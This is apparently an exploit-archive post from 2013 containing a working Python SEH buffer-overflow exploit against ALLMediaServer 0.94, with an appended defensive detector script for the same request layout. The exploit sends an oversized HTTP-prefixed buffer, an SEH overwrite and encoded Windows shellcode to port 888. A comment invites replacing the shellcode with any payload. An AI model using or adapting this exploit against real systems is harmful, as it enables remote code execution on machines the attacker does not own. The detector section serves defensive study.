ALLMediaServer 0.94 SEH Overflow
Source: metacom27@gmail.com  Author: metacom  Published: 2013-03-08
#!/usr/bin/python
import socket, sys

##############################################################
# Exploit Title: ALLMediaServer 0.94 SEH Overflow Exploit
# Date: 07/03/2013
# Exploit Author: metacom
# E-mail:metacom27@gmail.com
# Software Link:http://allmediaserver.org/download
# Version: ALLMediaServer 0.94
# Tested On: Windows 7 German
# ALLMediaServer running in online mode
##############################################################
# Usage: allmediaserver.py <ip>
host = sys.argv[1]

buffer = "http://" + "\x41" * 1065

nseh = "\xEB\x06\x90\x90"    # Short Jump  

seh = "\xCA\x24\xEC\x65"       #POP POP RET 0x65EC24CA   avcodec-53.dll

nop = "\x90" * 50
#msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' -e x86/shikata_ga_nai -t c
# You can replace the shellcode with any shellcode you want
shell = ("\xb8\x66\xa5\xa3\x41\xdb\xd5\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x33\x31\x43\x12\x83\xc3\x04\x03\x25\xab\x41\xb4\x55\x5b\x0c"
"\x37\xa5\x9c\x6f\xb1\x40\xad\xbd\xa5\x01\x9c\x71\xad\x47\x2d"
"\xf9\xe3\x73\xa6\x8f\x2b\x74\x0f\x25\x0a\xbb\x90\x8b\x92\x17"
"\x52\x8d\x6e\x65\x87\x6d\x4e\xa6\xda\x6c\x97\xda\x15\x3c\x40"
"\x91\x84\xd1\xe5\xe7\x14\xd3\x29\x6c\x24\xab\x4c\xb2\xd1\x01"
"\x4e\xe2\x4a\x1d\x18\x1a\xe0\x79\xb9\x1b\x25\x9a\x85\x52\x42"
"\x69\x7d\x65\x82\xa3\x7e\x54\xea\x68\x41\x59\xe7\x71\x85\x5d"
"\x18\x04\xfd\x9e\xa5\x1f\xc6\xdd\x71\x95\xdb\x45\xf1\x0d\x38"
"\x74\xd6\xc8\xcb\x7a\x93\x9f\x94\x9e\x22\x73\xaf\x9a\xaf\x72"
"\x60\x2b\xeb\x50\xa4\x70\xaf\xf9\xfd\xdc\x1e\x05\x1d\xb8\xff"
"\xa3\x55\x2a\xeb\xd2\x37\x20\xea\x57\x42\x0d\xec\x67\x4d\x3d"
"\x85\x56\xc6\xd2\xd2\x66\x0d\x97\x2d\x2d\x0c\xb1\xa5\xe8\xc4"
"\x80\xab\x0a\x33\xc6\xd5\x88\xb6\xb6\x21\x90\xb2\xb3\x6e\x16"
"\x2e\xc9\xff\xf3\x50\x7e\xff\xd1\x32\xe1\x93\xba\x9a\x84\x13"
"\x58\xe3")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 888)) #default port
s.send(buffer+nseh+seh+nop+shell)
print "Exploit sent! Open Calc :)\n"
s.close()
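
A detection-side view of the request layout the script above builds (an "http://" prefix, 1065 filler bytes, a short-jump next-SEH value, a NOP run), added here as an example and not part of the original post. The 512-byte URL limit, the run-length thresholds and both sample inputs are assumptions; the constructed sample carries placeholder bytes, not a payload.

```python
import re

MAX_URL_LEN = 512                                    # assumed policy limit
FILLER_RUN = re.compile(rb"(.)\1{255,}", re.DOTALL)  # 256+ identical bytes (assumed threshold)
NOP_RUN = re.compile(rb"\x90{16,}")                  # 16+ NOP bytes (assumed threshold)
SHORT_JMP_NSEH = b"\xEB\x06\x90\x90"                 # next-SEH value used in the script above


def inspect_request(data: bytes) -> list:
    """Return the names of the heuristics that a captured request trips."""
    findings = []
    if data.startswith(b"http://"):
        # Treat everything up to the first space/CR/LF (or end of data) as the URL.
        url = re.split(rb"[\r\n ]", data, maxsplit=1)[0]
        if len(url) > MAX_URL_LEN:
            findings.append("oversized-url")
        if any(b < 0x21 or b > 0x7E for b in url):
            findings.append("non-printable-in-url")
    if FILLER_RUN.search(data):
        findings.append("filler-run")
    if NOP_RUN.search(data):
        findings.append("nop-run")
    if SHORT_JMP_NSEH in data:
        findings.append("short-jump-seh-record")
    return findings


def constructed_overflow_sample() -> bytes:
    """Constructed test input with the same layout; placeholders, no payload."""
    return (b"http://" + b"A" * 1065 + SHORT_JMP_NSEH
            + b"BBBB"          # placeholder where the handler address sits
            + b"\x90" * 50
            + b"\xCC" * 16)    # placeholder bytes instead of shellcode


BENIGN_SAMPLE = b"http://192.168.1.10:888/media/library.xml"  # constructed

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_SAMPLE),
                       ("overflow-layout", constructed_overflow_sample())):
        print(name, len(data), inspect_request(data))
```

The same checks can sit in a proxy or IDS rule in front of the service's default port 888; the length limit alone catches the request before any byte-pattern heuristic is needed.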


 